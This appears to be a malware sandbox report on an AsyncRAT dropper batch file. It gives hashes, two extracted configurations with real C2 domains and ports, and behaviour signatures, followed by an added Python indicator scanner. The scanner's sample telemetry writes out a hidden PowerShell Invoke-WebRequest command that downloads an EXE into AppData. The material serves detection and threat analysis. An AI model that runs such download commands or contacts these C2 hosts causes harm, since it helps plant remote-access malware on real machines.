General

  • Target

    new.bat

  • Size

    4KB

  • Sample

    241216-vx5d6axjbq

  • MD5

    b79e56969d36c4b969bbe1623142e74a

  • SHA1

    a7bcc5273b86e75dad66fed8fab1ec546ffa3bfd

  • SHA256

    6eb141225c4e4bfe3c347cac44b939ef697616b32e7d3646d6944210d99d0960

  • SHA512

    fb9df37d81d5a9e8fa4500db392df29c4e7e8017cb9705277da7e1a2f0eb3b9df529c657174488998ba5cb82fb51149d31e666190c6de7e86773ac8e7711a356

  • SSDEEP

    96:EDONgDQ901HqmgGM5olT539rHZdrMkSKHUEeW05qy:EDpDe01HqGO5j

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

sdanarchynd.duckdns.org:7878

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

soasyncb.duckdns.org:6745

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Targets

    • Target

      new.bat

    • Size

      4KB

    • MD5

      b79e56969d36c4b969bbe1623142e74a

    • SHA1

      a7bcc5273b86e75dad66fed8fab1ec546ffa3bfd

    • SHA256

      6eb141225c4e4bfe3c347cac44b939ef697616b32e7d3646d6944210d99d0960

    • SHA512

      fb9df37d81d5a9e8fa4500db392df29c4e7e8017cb9705277da7e1a2f0eb3b9df529c657174488998ba5cb82fb51149d31e666190c6de7e86773ac8e7711a356

    • SSDEEP

      96:EDONgDQ901HqmgGM5olT539rHZdrMkSKHUEeW05qy:EDpDe01HqGO5j

    • AsyncRat

      AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

    • Asyncrat family

    • Suspicious use of NtCreateUserProcessOtherParentProcess

    • Async RAT payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest (used by the batch script to download its payload).

    • Executes dropped EXE

    • Loads dropped DLL

    • Enumerates processes with tasklist
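The two extracted AsyncRAT configurations above (C2 hosts, ports, mutex, install folder) and the behavioural signatures listed under Targets can be turned into a small set of host and network indicators and checked against process, DNS, network and mutex telemetry. The following is an added example written for this page, not code from the sandbox or from the AsyncRAT project: the event schema (`type`, `cmdline`, `query`, `dst_host`, `dst_port`, `name`), the regexes standing in for the "PowerShell Invoke-WebRequest", "Enumerates processes with tasklist" and "Executes dropped EXE" signatures, and every log line in `SAMPLE_EVENTS` are constructed assumptions; only the config values are taken from the report.

```python
"""Derive indicators from the AsyncRAT configs on this page and run them over
constructed telemetry.  Added example, not part of the sandbox report."""
import re
from dataclasses import dataclass, field

# Config values as reported on this page (two extracted AsyncRAT configs).
CONFIGS = [
    {"family": "asyncrat", "botnet": "Default", "c2": "sdanarchynd.duckdns.org:7878",
     "mutex": None, "delay": 1, "install": False, "install_folder": "%AppData%"},
    {"family": "asyncrat", "version": "0.5.7B", "botnet": "Default",
     "c2": "soasyncb.duckdns.org:6745", "mutex": "AsyncMutex_6SI8OkPnk",
     "delay": 3, "install": False, "install_folder": "%AppData%"},
]


@dataclass
class Indicators:
    hosts: set = field(default_factory=set)    # C2 hostnames (high confidence)
    ports: set = field(default_factory=set)    # C2 ports (low confidence alone)
    mutexes: set = field(default_factory=set)  # client mutex names


def extract_indicators(configs):
    """Split each 'host:port' C2 string and collect mutexes into an Indicators set."""
    ind = Indicators()
    for cfg in configs:
        host, _, port = cfg["c2"].rpartition(":")
        ind.hosts.add(host.lower())
        ind.ports.add(int(port))
        if cfg.get("mutex"):
            ind.mutexes.add(cfg["mutex"])
    return ind


# Assumed command-line shapes for the behaviours listed under Targets.
BEHAVIOUR_PATTERNS = {
    "powershell_invoke_webrequest": re.compile(r"powershell.*(invoke-webrequest|\biwr\b)", re.I),
    "tasklist_enumeration": re.compile(r"\btasklist(\.exe)?\b", re.I),
    # install_folder is %AppData%, so an EXE launched from Roaming is worth flagging.
    "exec_from_appdata": re.compile(r"\\AppData\\Roaming\\[^\\\s\"]+\.exe", re.I),
}


def scan_events(events, ind):
    """Return a list of (event_index, reason) for every event matching an indicator."""
    hits = []
    for i, ev in enumerate(events):
        t = ev.get("type")
        if t == "dns" and ev.get("query", "").lower() in ind.hosts:
            hits.append((i, f"dns:{ev['query'].lower()}"))
        elif t == "net":
            host = ev.get("dst_host", "").lower()
            if host in ind.hosts:
                hits.append((i, f"net:{host}:{ev.get('dst_port')}"))
            elif ev.get("dst_port") in ind.ports:
                # Port alone is weak evidence; report it separately so it can be tuned.
                hits.append((i, f"net_port_only:{ev.get('dst_port')}"))
        elif t == "mutex" and ev.get("name") in ind.mutexes:
            hits.append((i, f"mutex:{ev['name']}"))
        elif t == "process":
            cmd = ev.get("cmdline", "")
            for name, pat in BEHAVIOUR_PATTERNS.items():
                if pat.search(cmd):
                    hits.append((i, f"behaviour:{name}"))
    return hits


# Constructed telemetry for illustration (not captured from the sample).
SAMPLE_EVENTS = [
    {"type": "process", "image": "cmd.exe", "cmdline": "cmd.exe /c new.bat"},
    {"type": "process", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "Invoke-WebRequest http://example.invalid/x -OutFile $env:APPDATA\\x.exe"'},
    {"type": "dns", "query": "soasyncb.duckdns.org"},
    {"type": "net", "dst_host": "soasyncb.duckdns.org", "dst_port": 6745},
    {"type": "mutex", "name": "AsyncMutex_6SI8OkPnk"},
    {"type": "process", "image": "tasklist.exe", "cmdline": "tasklist /v"},
    {"type": "process", "image": "x.exe", "cmdline": '"C:\\Users\\u\\AppData\\Roaming\\x.exe"'},
    {"type": "net", "dst_host": "203.0.113.5", "dst_port": 7878},   # port-only match
    {"type": "dns", "query": "www.example.com"},                    # benign
    {"type": "process", "image": "notepad.exe", "cmdline": "notepad.exe"},  # benign
]


if __name__ == "__main__":
    indicators = extract_indicators(CONFIGS)
    for idx, reason in scan_events(SAMPLE_EVENTS, indicators):
        print(f"event {idx}: {reason}")
```

Hostname and mutex matches are the actionable signals here; the port-only branch exists so a port hit against an unrelated destination surfaces as low confidence instead of being silently merged with a real C2 match, and the regexes are placeholders to be replaced with the detection content of whatever EDR or SIEM is in use.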

MITRE ATT&CK Enterprise v15

Tasks